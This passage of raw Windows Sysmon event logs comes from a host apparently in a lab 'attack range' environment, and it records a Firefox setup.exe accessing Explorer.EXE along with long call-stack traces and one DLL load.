ge.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\d3dcompiler_47.dll2021-01-18 13:59:52.271 10341000x800000000000000014687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 